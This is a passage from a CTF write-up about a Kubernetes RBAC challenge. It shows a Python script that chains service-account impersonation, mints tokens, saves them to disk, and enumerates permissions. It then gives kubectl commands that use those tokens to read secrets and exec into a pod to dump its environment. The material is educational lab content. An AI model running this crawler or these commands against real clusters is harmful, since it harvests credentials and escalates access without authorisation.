        user = impersonate_mapping[user]
    else:
        impersonate = ""

    command = [
        "kubectl",
        "-s",
        "https://localhost:8443",
        "--insecure-skip-tls-verify",
        "--token",
        get_token(user),
    ]
    if impersonate:
        command += [
            "--as",
            f"system:serviceaccount:default:{impersonate}",
        ]
    command += final_command

    return subprocess.run(command, capture_output=True, text=True).stdout

# I don't know why I didn't have this save to tokens directly instead of having get_token do it _shrugs_
def create_token(user):
    return run_command(
        ["create", "token", user],
        user,
    )


def get_token(user):
    if user in tokens:
        return tokens[user]

    if user in impersonate_mapping:
        token = create_token(user)
        tokens[user] = token

        # Save all tokens to the filesystem so we can hop in wherever we need to later
        with open(tokens_path / user, "w") as f:
            f.write(token)

        return token


def auth_can_i(user):
    command = [
        "auth",
        "can-i",
        "--list",
    ]

    return run_command(command, user)

# this was meant to have multiple regexes for the different potential lateral movement techniques we might have to use
# but we didn't end up needing that
def check_permissions(user):
    # A simple regex to find permissions that let us impersonate other accounts, and to pull out which accounts
    impersonate_regex = re.compile(r"serviceaccounts +\[\] +\[(.*)\] +\[impersonate\]")

    permissions = auth_can_i(user)

    # save the permissions so we can search them later for other permissions we might care about and code them in
    with open(accounts / user, "w") as f:
        f.write(permissions)

    for line in permissions.split("\n"):
        match = re.match(impersonate_regex, line)
        if match:
            new_user = match.group(1)
            # turns out some service accounts could impersonate all other service accounts xD
            # I decided to ignore these for now, as I had no way to enumerate account names - to reach
            # one of those accounts we'd have needed an explicit impersonate path anyway, and the empty
            # match broke other parts of the script
            if new_user == "":
                continue
            # the same accounts were seen multiple times
            if new_user in tokens:
                continue
            # saves the needed impersonate path and token, then adds the new account to the enumerate todo list
            impersonate_mapping[new_user] = user
            get_token(new_user)
            todo.append(new_user)

# impersonate the todo list until we run out
while todo:
    user = todo.pop()
    check_permissions(user)
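
For completeness, running it is just a case of creating the two output directories and executing the script against the port-forwarded API server - the filename rbac_crawl.py here is just an arbitrary name for the code above:

mkdir -p accounts tokens
python3 rbac_crawl.py
ls accounts tokens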

After this had run, we had a folder full of permissions, and a folder full of tokens. Let’s see if there are any permissions that seem like they may be useful for next steps:

$ cat *  | grep -v "^ " | grep -v Resources | grep -v "^selfsubject" | grep -v serviceaccounts | sort -u
pods/exec                                       []                                     [nothingtoseehere]   [create get]
pods                                            []                                     [nothingtoseehere]   [create get]
secrets                                         []                                     []                [get list]

Looks like we have 3 permissions we might care about. One of them is for listing secrets which, based on the initial description, is likely to be a flag.

We also have the ability to exec into nothingtoseehere. Considering this challenge has 2 flags, this is likely going to be the path to our second flag.

Let’s start by looking at secrets:

$ grep -rH secrets .
./jaylinbrown:secrets                                         []                                     []                [get list]

Cool, so the jaylinbrown service account has permissions to list secrets. Let’s grab its token and retrieve the secrets.

$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/jaylinbrown) get secrets
NAME   TYPE     DATA   AGE
flag   Opaque   1      94m
$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/jaylinbrown) get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: ZmxhZ3tDb25ncmF0dWxhdGlvbnNfeW91X2F2b2lkZWRfb3VyX3RyYXBzfQ==
  kind: Secret
  metadata:
    creationTimestamp: "2024-06-27T15:34:50Z"
    name: flag
    namespace: default
    resourceVersion: "1483"
    uid: e456b35f-e2fa-4fed-b49e-f5b35464d4f1
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
$ base64 -d <<< ZmxhZ3tDb25ncmF0dWxhdGlvbnNfeW91X2F2b2lkZWRfb3VyX3RyYXBzfQ==
flag{Congratulations_you_avoided_our_traps}

Excellent, we have our first flag. Let’s do a similar thing for pods:

$ grep -rH pods .
./destinirau:pods/exec                                       []                                     [nothingtoseehere]   [create get]
./destinirau:pods                                            []                                     [nothingtoseehere]   [create get]
$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/destinirau) get pod nothingtoseehere
NAME               READY   STATUS    RESTARTS   AGE
nothingtoseehere   1/1     Running   0          96m
$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/destinirau) get pod nothingtoseehere -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    cni.projectcalico.org/containerID: 4bb7ca9d4358a7052ff8c3740e070def06d2d0527a8dd2d146dfc97ab9dc49a3
    cni.projectcalico.org/podIP: 192.168.84.129/32
    cni.projectcalico.org/podIPs: 192.168.84.129/32
  creationTimestamp: "2024-06-27T15:34:54Z"
  labels:
    run: nothingtoseehere
  name: nothingtoseehere
  namespace: default
  resourceVersion: "1682"
  uid: 123a99e6-3011-4707-8b8e-475f3567ff25
spec:
  containers:
  - env:
    - name: FLAG
      valueFrom:
        configMapKeyRef:
          key: flag2
          name: second-flag
    image: nginx
    imagePullPolicy: Always
    name: nothingtoseehere
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-5pbbm
      readOnly: true
[..SNIP..]

Of note in this pod specification, it looks like a flag is injected as an environment variable from a config map. We should be able to run env within the container and retrieve it:

$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/destinirau) exec -ti nothingtoseehere -- sh
# env
[..SNIP..]
FLAG=flag_ctf{You_found_the_sneaky_extra_permissions}

Excellent, that's our second flag and the completion of this CTF!

Conclusions

As always, this was a super fun CTF by ControlPlane. One comment might be that there is less of a storyline in the challenges than in previous ones, with these being a lot more direct to the punchline. I think my favourite from this one was the Labyrinth, but that's mostly because I generally like automating things, so it aligned with my overall interests. It has also given me a kick to finally build a tool I've been planning for quite a while, one that would definitely have helped with the third challenge.

With a maximum of 301 points up for grabs, the scoreboard from the CTF can be seen below - congrats juno:

Scoreboard